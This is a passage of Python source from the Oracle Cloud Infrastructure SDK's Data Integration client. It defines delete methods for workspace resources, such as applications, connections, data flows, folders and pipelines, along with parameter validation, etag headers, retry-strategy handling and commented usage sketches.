When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_application.py.html>`__ to see an example of how to use the delete_application API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_application got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_connection(self, workspace_id, connection_key, **kwargs):
"""
Removes a connection using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_connection.py.html>`__ to see an example of how to use the delete_connection API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_connection got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
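# Sketch of opting out of retries for a single call, per the docstring above:
# pass a NoneRetryStrategy instance. ``di_client`` and the identifiers are
# placeholders carried over from the sketch after delete_application.
#
#   from oci.retry import NoneRetryStrategy
#
#   di_client.delete_connection(
#       "ocid1.disworkspace.oc1..example",
#       "connection-key",
#       retry_strategy=NoneRetryStrategy())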
def delete_connection_validation(self, workspace_id, connection_validation_key, **kwargs):
"""
Deletes a connection validation.
:param str workspace_id: (required)
The workspace ID.
:param str connection_validation_key: (required)
The key of the connection validation.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_connection_validation.py.html>`__ to see an example of how to use the delete_connection_validation API.
"""
resource_path = "/workspaces/{workspaceId}/connectionValidations/{connectionValidationKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_connection_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionValidationKey": connection_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_data_asset(self, workspace_id, data_asset_key, **kwargs):
"""
Removes a data asset using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str data_asset_key: (required)
The data asset key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_data_asset.py.html>`__ to see an example of how to use the delete_data_asset API.
"""
resource_path = "/workspaces/{workspaceId}/dataAssets/{dataAssetKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataAssetKey": data_asset_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_data_flow(self, workspace_id, data_flow_key, **kwargs):
"""
Removes a data flow from a project or folder using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str data_flow_key: (required)
The data flow key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_data_flow.py.html>`__ to see an example of how to use the delete_data_flow API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlows/{dataFlowKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_data_flow got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataFlowKey": data_flow_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
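# Sketch of overriding the client-level retry strategy for one call, assuming
# the oci.retry.RetryStrategyBuilder API; as the kwargs handling above shows,
# the strategy applies to this delete_data_flow call only.
#
#   from oci.retry import RetryStrategyBuilder
#
#   custom_retry = RetryStrategyBuilder().add_max_attempts(
#       max_attempts=5).get_retry_strategy()
#   di_client.delete_data_flow(
#       "ocid1.disworkspace.oc1..example",
#       "data-flow-key",
#       retry_strategy=custom_retry)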
def delete_data_flow_validation(self, workspace_id, data_flow_validation_key, **kwargs):
"""
Removes a data flow validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str data_flow_validation_key: (required)
The key of the data flow validation.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_data_flow_validation.py.html>`__ to see an example of how to use the delete_data_flow_validation API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlowValidations/{dataFlowValidationKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_data_flow_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataFlowValidationKey": data_flow_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_external_publication(self, workspace_id, task_key, external_publications_key, **kwargs):
"""
Removes a published object using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str external_publications_key: (required)
The external published object key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_external_publication.py.html>`__ to see an example of how to use the delete_external_publication API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublications/{externalPublicationsKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_external_publication got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key,
"externalPublicationsKey": external_publications_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
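# Sketch of a call whose resource path has three interpolated segments, as in
# resource_path above; the positional arguments map to workspaceId, taskKey,
# and externalPublicationsKey. All identifiers are placeholders.
#
#   di_client.delete_external_publication(
#       "ocid1.disworkspace.oc1..example",
#       "task-key",
#       "external-publication-key")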
def delete_external_publication_validation(self, workspace_id, task_key, external_publication_validation_key, **kwargs):
"""
Removes an external publication validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str external_publication_validation_key: (required)
The key of the external publication validation.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_external_publication_validation.py.html>`__ to see an example of how to use the delete_external_publication_validation API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublicationValidations/{externalPublicationValidationKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_external_publication_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key,
"externalPublicationValidationKey": external_publication_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_folder(self, workspace_id, folder_key, **kwargs):
"""
Removes a folder from a project using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str folder_key: (required)
The folder key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_folder.py.html>`__ to see an example of how to use the delete_folder API.
"""
resource_path = "/workspaces/{workspaceId}/folders/{folderKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_folder got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"folderKey": folder_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
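# Sketch of handling a stale etag: per the if_match docs above, a mismatch
# yields HTTP 412, which the SDK raises as oci.exceptions.ServiceError.
# Identifiers and the etag value are placeholders.
#
#   import oci.exceptions
#
#   try:
#       di_client.delete_folder(
#           "ocid1.disworkspace.oc1..example",
#           "folder-key",
#           if_match="stale-etag")
#   except oci.exceptions.ServiceError as err:
#       if err.status == 412:
#           # Re-fetch the folder for a fresh etag, then retry the delete.
#           pass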
def delete_patch(self, workspace_id, application_key, patch_key, **kwargs):
"""
Removes a patch using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str patch_key: (required)
The patch key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_patch.py.html>`__ to see an example of how to use the delete_patch API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/patches/{patchKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_patch got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"patchKey": patch_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_pipeline(self, workspace_id, pipeline_key, **kwargs):
"""
Removes a pipeline from a project or folder using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str pipeline_key: (required)
The pipeline key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When `if-match` is provided and its value does not exactly match the `etag` of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_pipeline.py.html>`__ to see an example of how to use the delete_pipeline API.
"""
resource_path = "/workspaces/{workspaceId}/pipelines/{pipelineKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_pipeline got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"pipelineKey": pipeline_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
